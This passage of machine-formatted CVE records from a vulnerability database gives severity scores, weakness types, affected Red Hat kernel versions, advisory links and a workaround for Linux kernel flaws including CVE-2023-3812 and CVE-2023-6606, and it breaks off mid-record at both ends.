userspace, due to performance reasons, which disabled the implicit STIBP and left userspace threads vulnerable to cross-thread branch target injection against which STIBP protects.\n\n\n" } ], "impacts": [ { "capecId": "CAPEC-663", "descriptions": [ { "lang": "en", "value": "CAPEC-663 Exploitation of Transient Instruction Execution" } ] } ], "metrics": [ { "cvssV3_1": { "attackComplexity": "HIGH", "attackVector": "LOCAL", "availabilityImpact": "NONE", "baseScore": 5.6, "baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "LOW", "scope": "CHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:C/C:H/I:N/A:N", "version": "3.1" }, "format": "CVSS", "scenarios": [ { "lang": "en", "value": "GENERAL" } ] } ], "problemTypes": [ { "descriptions": [ { "cweId": "CWE-1303", "description": "CWE-1303 Non-Transparent Sharing of Microarchitectural Resources", "lang": "en", "type": "CWE" } ] } ], "providerMetadata": { "dateUpdated": "2023-04-21T14:51:52.907Z", "orgId": "14ed7db2-1595-443d-9d34-6215bf890778", "shortName": "Google" }, "references": [ { "url": "https://github.com/google/security-research/security/advisories/GHSA-mj4w-6495-6crx" }, { "url": "https://github.com/torvalds/linux/commit/6921ed9049bc7457f66c1596c5b78aec0dae4a9d" }, { "url": "https://kernel.dance/#6921ed9049bc7457f66c1596c5b78aec0dae4a9d" }, { "url": "https://lists.debian.org/debian-lts-announce/2023/05/msg00005.html" }, { "url": "https://lists.debian.org/debian-lts-announce/2023/05/msg00006.html" } ], "source": { "discovery": "UNKNOWN" }, "title": "Spectre v2 SMT mitigations problem in Linux kernel", "x_generator": { "engine": "Vulnogram 0.1.0-dev" } } }, "cveMetadata": { "assignerOrgId": "14ed7db2-1595-443d-9d34-6215bf890778", "assignerShortName": "Google", "cveId": "CVE-2023-1998", "datePublished": "2023-04-21T14:51:52.907Z", "dateReserved": "2023-04-12T09:38:13.899Z", "dateUpdated": "2024-08-02T06:05:27.106Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2023-3812
Vulnerability from cvelistv5
Published
2023-07-24 15:19
Modified
2024-09-13 18:23
Severity ?
EPSS score ?
Summary
Kernel: tun: bugs for oversize packet when napi frags enabled in tun_napi_alloc_frags
References
Impacted products
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-02T07:08:50.501Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "name": "RHSA-2023:6799", "tags": [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred" ], "url": "https://access.redhat.com/errata/RHSA-2023:6799" }, { "name": "RHSA-2023:6813", "tags": [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred" ], "url": "https://access.redhat.com/errata/RHSA-2023:6813" }, { "name": "RHSA-2023:7370", "tags": [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred" ], "url": "https://access.redhat.com/errata/RHSA-2023:7370" }, { "name": "RHSA-2023:7379", "tags": [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred" ], "url": "https://access.redhat.com/errata/RHSA-2023:7379" }, { "name": "RHSA-2023:7382", "tags": [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred" ], "url": "https://access.redhat.com/errata/RHSA-2023:7382" }, { "name": "RHSA-2023:7389", "tags": [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred" ], "url": "https://access.redhat.com/errata/RHSA-2023:7389" }, { "name": "RHSA-2023:7411", "tags": [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred" ], "url": "https://access.redhat.com/errata/RHSA-2023:7411" }, { "name": "RHSA-2023:7418", "tags": [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred" ], "url": "https://access.redhat.com/errata/RHSA-2023:7418" }, { "name": "RHSA-2023:7548", "tags": [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred" ], "url": "https://access.redhat.com/errata/RHSA-2023:7548" }, { "name": "RHSA-2023:7549", "tags": [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred" ], "url": "https://access.redhat.com/errata/RHSA-2023:7549" }, { "name": "RHSA-2023:7554", "tags": [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred" ], "url": "https://access.redhat.com/errata/RHSA-2023:7554" }, { "name": "RHSA-2024:0340", "tags": [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred" ], "url": "https://access.redhat.com/errata/RHSA-2024:0340" }, { "name": "RHSA-2024:0378", "tags": [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred" ], "url": "https://access.redhat.com/errata/RHSA-2024:0378" }, { "name": "RHSA-2024:0412", "tags": [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred" ], "url": "https://access.redhat.com/errata/RHSA-2024:0412" }, { "name": "RHSA-2024:0461", "tags": [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred" ], "url": "https://access.redhat.com/errata/RHSA-2024:0461" }, { "name": "RHSA-2024:0554", "tags": [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred" ], "url": "https://access.redhat.com/errata/RHSA-2024:0554" }, { "name": "RHSA-2024:0562", "tags": [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred" ], "url": "https://access.redhat.com/errata/RHSA-2024:0562" }, { "name": "RHSA-2024:0563", "tags": [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred" ], "url": "https://access.redhat.com/errata/RHSA-2024:0563" }, { "name": "RHSA-2024:0575", "tags": [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred" ], "url": "https://access.redhat.com/errata/RHSA-2024:0575" }, { "name": "RHSA-2024:0593", "tags": [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred" ], "url": "https://access.redhat.com/errata/RHSA-2024:0593" }, { "name": "RHSA-2024:1961", "tags": [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred" ], "url": "https://access.redhat.com/errata/RHSA-2024:1961" }, { "name": "RHSA-2024:2006", "tags": [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred" ], "url": "https://access.redhat.com/errata/RHSA-2024:2006" }, { "name": "RHSA-2024:2008", "tags": [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred" ], "url": "https://access.redhat.com/errata/RHSA-2024:2008" }, { "tags": [ "vdb-entry", "x_refsource_REDHAT", "x_transferred" ], "url": "https://access.redhat.com/security/cve/CVE-2023-3812" }, { "name": "RHBZ#2224048", "tags": [ "issue-tracking", "x_refsource_REDHAT", "x_transferred" ], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2224048" }, { "tags": [ "x_transferred" ], "url": "https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=363a5328f4b0" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/a:redhat:enterprise_linux:8::realtime", "cpe:/a:redhat:enterprise_linux:8::nfv" ], "defaultStatus": "affected", "packageName": "kernel-rt", "product": "Red Hat Enterprise Linux 8", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "0:4.18.0-513.9.1.rt7.311.el8_9", "versionType": "rpm" } ] }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/a:redhat:enterprise_linux:8::crb", "cpe:/o:redhat:enterprise_linux:8::baseos" ], "defaultStatus": "affected", "packageName": "kernel", "product": "Red Hat Enterprise Linux 8", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "0:4.18.0-513.9.1.el8_9", "versionType": "rpm" } ] }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/o:redhat:enterprise_linux:8::baseos" ], "defaultStatus": "unaffected", "packageName": "kpatch-patch", "product": "Red Hat Enterprise Linux 8", "vendor": "Red Hat" }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/o:redhat:rhel_e4s:8.1::baseos" ], "defaultStatus": "unaffected", "packageName": "kpatch-patch", "product": "Red Hat Enterprise Linux 8.1 Update Services for SAP Solutions", "vendor": "Red Hat" }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/o:redhat:rhel_e4s:8.1::baseos" ], "defaultStatus": "affected", "packageName": "kernel", "product": "Red Hat Enterprise Linux 8.1 Update Services for SAP Solutions", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "0:4.18.0-147.94.1.el8_1", "versionType": "rpm" } ] }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/o:redhat:rhel_e4s:8.2::baseos", "cpe:/o:redhat:rhel_aus:8.2::baseos", "cpe:/o:redhat:rhel_tus:8.2::baseos" ], "defaultStatus": "affected", "packageName": "kernel", "product": "Red Hat Enterprise Linux 8.2 Advanced Update Support", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "0:4.18.0-193.133.1.el8_2", "versionType": "rpm" } ] }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/a:redhat:rhel_tus:8.2::realtime", "cpe:/a:redhat:rhel_tus:8.2::nfv" ], "defaultStatus": "affected", "packageName": "kernel-rt", "product": "Red Hat Enterprise Linux 8.2 Telecommunications Update Service", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "0:4.18.0-193.133.1.rt13.184.el8_2", "versionType": "rpm" } ] }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/o:redhat:rhel_e4s:8.2::baseos", "cpe:/o:redhat:rhel_aus:8.2::baseos", "cpe:/o:redhat:rhel_tus:8.2::baseos" ], "defaultStatus": "affected", "packageName": "kernel", "product": "Red Hat Enterprise Linux 8.2 Telecommunications Update Service", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "0:4.18.0-193.133.1.el8_2", "versionType": "rpm" } ] }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/o:redhat:rhel_e4s:8.2::baseos" ], "defaultStatus": "unaffected", "packageName": "kpatch-patch", "product": "Red Hat Enterprise Linux 8.2 Update Services for SAP Solutions", "vendor": "Red Hat" }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/o:redhat:rhel_e4s:8.2::baseos", "cpe:/o:redhat:rhel_aus:8.2::baseos", "cpe:/o:redhat:rhel_tus:8.2::baseos" ], "defaultStatus": "affected", "packageName": "kernel", "product": "Red Hat Enterprise Linux 8.2 Update Services for SAP Solutions", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "0:4.18.0-193.133.1.el8_2", "versionType": "rpm" } ] }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/o:redhat:rhel_tus:8.4::baseos", "cpe:/o:redhat:rhel_e4s:8.4::baseos", "cpe:/o:redhat:rhel_aus:8.4::baseos" ], "defaultStatus": "affected", "packageName": "kernel", "product": "Red Hat Enterprise Linux 8.4 Advanced Mission Critical Update Support", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "0:4.18.0-305.120.1.el8_4", "versionType": "rpm" } ] }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/a:redhat:rhel_tus:8.4::realtime", "cpe:/a:redhat:rhel_tus:8.4::nfv" ], "defaultStatus": "affected", "packageName": "kernel-rt", "product": "Red Hat Enterprise Linux 8.4 Telecommunications Update Service", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "0:4.18.0-305.120.1.rt7.196.el8_4", "versionType": "rpm" } ] }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/o:redhat:rhel_tus:8.4::baseos", "cpe:/o:redhat:rhel_e4s:8.4::baseos", "cpe:/o:redhat:rhel_aus:8.4::baseos" ], "defaultStatus": "affected", "packageName": "kernel", "product": "Red Hat Enterprise Linux 8.4 Telecommunications Update Service", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "0:4.18.0-305.120.1.el8_4", "versionType": "rpm" } ] }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/o:redhat:rhel_tus:8.4::baseos", "cpe:/o:redhat:rhel_e4s:8.4::baseos", "cpe:/o:redhat:rhel_aus:8.4::baseos" ], "defaultStatus": "affected", "packageName": "kernel", "product": "Red Hat Enterprise Linux 8.4 Update Services for SAP Solutions", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "0:4.18.0-305.120.1.el8_4", "versionType": "rpm" } ] }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/o:redhat:rhel_e4s:8.4::baseos" ], "defaultStatus": "unaffected", "packageName": "kpatch-patch", "product": "Red Hat Enterprise Linux 8.4 Update Services for SAP Solutions", "vendor": "Red Hat" }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/o:redhat:rhel_eus:8.6::baseos" ], "defaultStatus": "unaffected", "packageName": "kpatch-patch", "product": "Red Hat Enterprise Linux 8.6 Extended Update Support", "vendor": "Red Hat" }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/o:redhat:rhev_hypervisor:4.4::el8", "cpe:/a:redhat:rhel_eus:8.6::crb", "cpe:/o:redhat:rhel_eus:8.6::baseos" ], "defaultStatus": "affected", "packageName": "kernel", "product": "Red Hat Enterprise Linux 8.6 Extended Update Support", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "0:4.18.0-372.87.1.el8_6", "versionType": "rpm" } ] }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/o:redhat:rhel_eus:8.8::baseos" ], "defaultStatus": "unaffected", "packageName": "kpatch-patch", "product": "Red Hat Enterprise Linux 8.8 Extended Update Support", "vendor": "Red Hat" }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/o:redhat:rhel_eus:8.8::baseos", "cpe:/a:redhat:rhel_eus:8.8::crb" ], "defaultStatus": "affected", "packageName": "kernel", "product": "Red Hat Enterprise Linux 8.8 Extended Update Support", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "0:4.18.0-477.43.1.el8_8", "versionType": "rpm" } ] }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/o:redhat:enterprise_linux:9::baseos", "cpe:/a:redhat:enterprise_linux:9::nfv", "cpe:/a:redhat:enterprise_linux:9::appstream", "cpe:/a:redhat:enterprise_linux:9::crb", "cpe:/a:redhat:enterprise_linux:9::realtime" ], "defaultStatus": "affected", "packageName": "kernel", "product": "Red Hat Enterprise Linux 9", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "0:5.14.0-362.18.1.el9_3", "versionType": "rpm" } ] }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/o:redhat:enterprise_linux:9::baseos" ], "defaultStatus": "unaffected", "packageName": "kpatch-patch", "product": "Red Hat Enterprise Linux 9", "vendor": "Red Hat" }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/o:redhat:enterprise_linux:9::baseos", "cpe:/a:redhat:enterprise_linux:9::nfv", "cpe:/a:redhat:enterprise_linux:9::appstream", "cpe:/a:redhat:enterprise_linux:9::crb", "cpe:/a:redhat:enterprise_linux:9::realtime" ], "defaultStatus": "affected", "packageName": "kernel", "product": "Red Hat Enterprise Linux 9", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "0:5.14.0-362.18.1.el9_3", "versionType": "rpm" } ] }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/o:redhat:rhel_eus:9.0::baseos", "cpe:/a:redhat:rhel_eus:9.0::appstream", "cpe:/a:redhat:rhel_eus:9.0::crb" ], "defaultStatus": "affected", "packageName": "kernel", "product": "Red Hat Enterprise Linux 9.0 Extended Update Support", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "0:5.14.0-70.80.1.el9_0", "versionType": "rpm" } ] }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/a:redhat:rhel_eus:9.0::realtime", "cpe:/a:redhat:rhel_eus:9.0::nfv" ], "defaultStatus": "affected", "packageName": "kernel-rt", "product": "Red Hat Enterprise Linux 9.0 Extended Update Support", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "0:5.14.0-70.80.1.rt21.151.el9_0", "versionType": "rpm" } ] }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/o:redhat:rhel_eus:9.0::baseos" ], "defaultStatus": "unaffected", "packageName": "kpatch-patch", "product": "Red Hat Enterprise Linux 9.0 Extended Update Support", "vendor": "Red Hat" }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/a:redhat:rhel_eus:9.2::appstream", "cpe:/o:redhat:rhel_eus:9.2::baseos", "cpe:/a:redhat:rhel_eus:9.2::crb" ], "defaultStatus": "affected", "packageName": "kernel", "product": "Red Hat Enterprise Linux 9.2 Extended Update Support", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "0:5.14.0-284.40.1.el9_2", "versionType": "rpm" } ] }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/a:redhat:rhel_eus:9.2::nfv", "cpe:/a:redhat:rhel_eus:9.2::realtime" ], "defaultStatus": "affected", "packageName": "kernel-rt", "product": "Red Hat Enterprise Linux 9.2 Extended Update Support", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "0:5.14.0-284.40.1.rt14.325.el9_2", "versionType": "rpm" } ] }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/o:redhat:rhel_eus:9.2::baseos" ], "defaultStatus": "unaffected", "packageName": "kpatch-patch", "product": "Red Hat Enterprise Linux 9.2 Extended Update Support", "vendor": "Red Hat" }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/o:redhat:rhev_hypervisor:4.4::el8", "cpe:/a:redhat:rhel_eus:8.6::crb", "cpe:/o:redhat:rhel_eus:8.6::baseos" ], "defaultStatus": "affected", "packageName": "kernel", "product": "Red Hat Virtualization 4 for Red Hat Enterprise Linux 8", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "0:4.18.0-372.87.1.el8_6", "versionType": "rpm" } ] }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/o:redhat:enterprise_linux:6" ], "defaultStatus": "unaffected", "packageName": "kernel", "product": "Red Hat Enterprise Linux 6", "vendor": "Red Hat" }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/o:redhat:enterprise_linux:7" ], "defaultStatus": "unaffected", "packageName": "kernel", "product": "Red Hat Enterprise Linux 7", "vendor": "Red Hat" }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/o:redhat:enterprise_linux:7" ], "defaultStatus": "unaffected", "packageName": "kernel-rt", "product": "Red Hat Enterprise Linux 7", "vendor": "Red Hat" }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/o:redhat:enterprise_linux:9" ], "defaultStatus": "affected", "packageName": "kernel-rt", "product": "Red Hat Enterprise Linux 9", "vendor": "Red Hat" } ], "datePublic": "2022-10-22T00:00:00+00:00", "descriptions": [ { "lang": "en", "value": "An out-of-bounds memory access flaw was found in the Linux kernel\u2019s TUN/TAP device driver functionality in how a user generates a malicious (too big) networking packet when napi frags is enabled. This flaw allows a local user to crash or potentially escalate their privileges on the system." } ], "metrics": [ { "other": { "content": { "namespace": "https://access.redhat.com/security/updates/classification/", "value": "Important" }, "type": "Red Hat severity rating" } }, { "cvssV3_1": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "format": "CVSS" } ], "problemTypes": [ { "descriptions": [ { "cweId": "CWE-787", "description": "Out-of-bounds Write", "lang": "en", "type": "CWE" } ] } ], "providerMetadata": { "dateUpdated": "2024-09-13T18:23:19.887Z", "orgId": "53f830b8-0a3f-465b-8143-3b8a9948e749", "shortName": "redhat" }, "references": [ { "name": "RHSA-2023:6799", "tags": [ "vendor-advisory", "x_refsource_REDHAT" ], "url": "https://access.redhat.com/errata/RHSA-2023:6799" }, { "name": "RHSA-2023:6813", "tags": [ "vendor-advisory", "x_refsource_REDHAT" ], "url": "https://access.redhat.com/errata/RHSA-2023:6813" }, { "name": "RHSA-2023:7370", "tags": [ "vendor-advisory", "x_refsource_REDHAT" ], "url": "https://access.redhat.com/errata/RHSA-2023:7370" }, { "name": "RHSA-2023:7379", "tags": [ "vendor-advisory", "x_refsource_REDHAT" ], "url": "https://access.redhat.com/errata/RHSA-2023:7379" }, { "name": "RHSA-2023:7382", "tags": [ "vendor-advisory", "x_refsource_REDHAT" ], "url": "https://access.redhat.com/errata/RHSA-2023:7382" }, { "name": "RHSA-2023:7389", "tags": [ "vendor-advisory", "x_refsource_REDHAT" ], "url": "https://access.redhat.com/errata/RHSA-2023:7389" }, { "name": "RHSA-2023:7411", "tags": [ "vendor-advisory", "x_refsource_REDHAT" ], "url": "https://access.redhat.com/errata/RHSA-2023:7411" }, { "name": "RHSA-2023:7418", "tags": [ "vendor-advisory", "x_refsource_REDHAT" ], "url": "https://access.redhat.com/errata/RHSA-2023:7418" }, { "name": "RHSA-2023:7548", "tags": [ "vendor-advisory", "x_refsource_REDHAT" ], "url": "https://access.redhat.com/errata/RHSA-2023:7548" }, { "name": "RHSA-2023:7549", "tags": [ "vendor-advisory", "x_refsource_REDHAT" ], "url": "https://access.redhat.com/errata/RHSA-2023:7549" }, { "name": "RHSA-2023:7554", "tags": [ "vendor-advisory", "x_refsource_REDHAT" ], "url": "https://access.redhat.com/errata/RHSA-2023:7554" }, { "name": "RHSA-2024:0340", "tags": [ "vendor-advisory", "x_refsource_REDHAT" ], "url": "https://access.redhat.com/errata/RHSA-2024:0340" }, { "name": "RHSA-2024:0378", "tags": [ "vendor-advisory", "x_refsource_REDHAT" ], "url": "https://access.redhat.com/errata/RHSA-2024:0378" }, { "name": "RHSA-2024:0412", "tags": [ "vendor-advisory", "x_refsource_REDHAT" ], "url": "https://access.redhat.com/errata/RHSA-2024:0412" }, { "name": "RHSA-2024:0461", "tags": [ "vendor-advisory", "x_refsource_REDHAT" ], "url": "https://access.redhat.com/errata/RHSA-2024:0461" }, { "name": "RHSA-2024:0554", "tags": [ "vendor-advisory", "x_refsource_REDHAT" ], "url": "https://access.redhat.com/errata/RHSA-2024:0554" }, { "name": "RHSA-2024:0562", "tags": [ "vendor-advisory", "x_refsource_REDHAT" ], "url": "https://access.redhat.com/errata/RHSA-2024:0562" }, { "name": "RHSA-2024:0563", "tags": [ "vendor-advisory", "x_refsource_REDHAT" ], "url": "https://access.redhat.com/errata/RHSA-2024:0563" }, { "name": "RHSA-2024:0575", "tags": [ "vendor-advisory", "x_refsource_REDHAT" ], "url": "https://access.redhat.com/errata/RHSA-2024:0575" }, { "name": "RHSA-2024:0593", "tags": [ "vendor-advisory", "x_refsource_REDHAT" ], "url": "https://access.redhat.com/errata/RHSA-2024:0593" }, { "name": "RHSA-2024:1961", "tags": [ "vendor-advisory", "x_refsource_REDHAT" ], "url": "https://access.redhat.com/errata/RHSA-2024:1961" }, { "name": "RHSA-2024:2006", "tags": [ "vendor-advisory", "x_refsource_REDHAT" ], "url": "https://access.redhat.com/errata/RHSA-2024:2006" }, { "name": "RHSA-2024:2008", "tags": [ "vendor-advisory", "x_refsource_REDHAT" ], "url": "https://access.redhat.com/errata/RHSA-2024:2008" }, { "tags": [ "vdb-entry", "x_refsource_REDHAT" ], "url": "https://access.redhat.com/security/cve/CVE-2023-3812" }, { "name": "RHBZ#2224048", "tags": [ "issue-tracking", "x_refsource_REDHAT" ], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2224048" }, { "url": "https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=363a5328f4b0" } ], "timeline": [ { "lang": "en", "time": "2023-07-19T00:00:00+00:00", "value": "Reported to Red Hat." }, { "lang": "en", "time": "2022-10-22T00:00:00+00:00", "value": "Made public." } ], "title": "Kernel: tun: bugs for oversize packet when napi frags enabled in tun_napi_alloc_frags", "workarounds": [ { "lang": "en", "value": "To mitigate this issue, prevent the tun module from being loaded. Please see https://access.redhat.com/solutions/41278 for how to blacklist a kernel module to prevent it from loading automatically." } ], "x_redhatCweChain": "(CWE-416|CWE-787): Use After Free or Out-of-bounds Write" } }, "cveMetadata": { "assignerOrgId": "53f830b8-0a3f-465b-8143-3b8a9948e749", "assignerShortName": "redhat", "cveId": "CVE-2023-3812", "datePublished": "2023-07-24T15:19:21.817Z", "dateReserved": "2023-07-20T13:02:44.826Z", "dateUpdated": "2024-09-13T18:23:19.887Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2023-6606
Vulnerability from cvelistv5
Published
2023-12-08 16:58
Modified
2024-09-13 23:30
Severity ?
EPSS score ?
Summary
Kernel: out-of-bounds read vulnerability in smbcalcsize
References
▼ | URL | Tags |
---|---|---|
https://access.redhat.com/errata/RHSA-2024:0723 | vendor-advisory, x_refsource_REDHAT | |
https://access.redhat.com/errata/RHSA-2024:0725 | vendor-advisory, x_refsource_REDHAT | |
https://access.redhat.com/errata/RHSA-2024:0881 | vendor-advisory, x_refsource_REDHAT | |
https://access.redhat.com/errata/RHSA-2024:0897 | vendor-advisory, x_refsource_REDHAT | |
https://access.redhat.com/errata/RHSA-2024:1188 | vendor-advisory, x_refsource_REDHAT | |
https://access.redhat.com/errata/RHSA-2024:1248 | vendor-advisory, x_refsource_REDHAT | |
https://access.redhat.com/errata/RHSA-2024:1404 | vendor-advisory, x_refsource_REDHAT | |
https://access.redhat.com/errata/RHSA-2024:2094 | vendor-advisory, x_refsource_REDHAT | |
https://access.redhat.com/security/cve/CVE-2023-6606 | vdb-entry, x_refsource_REDHAT | |
https://bugzilla.kernel.org/show_bug.cgi?id=218218 | ||
https://bugzilla.redhat.com/show_bug.cgi?id=2253611 | issue-tracking, x_refsource_REDHAT |
Impacted products
{ "containers": { "adp": [ { "metrics": [ { "other": { "content": { "id": "CVE-2023-6606", "options": [ { "Exploitation": "poc" }, { "Automatable": "no" }, { "Technical Impact": "partial" } ], "role": "CISA Coordinator", "timestamp": "2023-12-11T21:20:47.767463Z", "version": "2.0.3" }, "type": "ssvc" } } ], "providerMetadata": { "dateUpdated": "2024-07-11T14:22:01.806Z", "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "shortName": "CISA-ADP" }, "title": "CISA ADP Vulnrichment" }, { "providerMetadata": { "dateUpdated": "2024-08-02T08:35:14.877Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "name": "RHSA-2024:0723", "tags": [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred" ], "url": "https://access.redhat.com/errata/RHSA-2024:0723" }, { "name": "RHSA-2024:0725", "tags": [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred" ], "url": "https://access.redhat.com/errata/RHSA-2024:0725" }, { "name": "RHSA-2024:0881", "tags": [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred" ], "url": "https://access.redhat.com/errata/RHSA-2024:0881" }, { "name": "RHSA-2024:0897", "tags": [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred" ], "url": "https://access.redhat.com/errata/RHSA-2024:0897" }, { "name": "RHSA-2024:1188", "tags": [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred" ], "url": "https://access.redhat.com/errata/RHSA-2024:1188" }, { "name": "RHSA-2024:1248", "tags": [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred" ], "url": "https://access.redhat.com/errata/RHSA-2024:1248" }, { "name": "RHSA-2024:1404", "tags": [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred" ], "url": "https://access.redhat.com/errata/RHSA-2024:1404" }, { "name": "RHSA-2024:2094", "tags": [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred" ], "url": "https://access.redhat.com/errata/RHSA-2024:2094" }, { "tags": [ "vdb-entry", "x_refsource_REDHAT", "x_transferred" ], "url": "https://access.redhat.com/security/cve/CVE-2023-6606" }, { "tags": [ "x_transferred" ], "url": "https://bugzilla.kernel.org/show_bug.cgi?id=218218" }, { "name": "RHBZ#2253611", "tags": [ "issue-tracking", "x_refsource_REDHAT", "x_transferred" ], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2253611" }, { "tags": [ "x_transferred" ], "url": "https://lists.debian.org/debian-lts-announce/2024/01/msg00004.html" }, { "tags": [ "x_transferred" ], "url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00016.html" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "collectionURL": 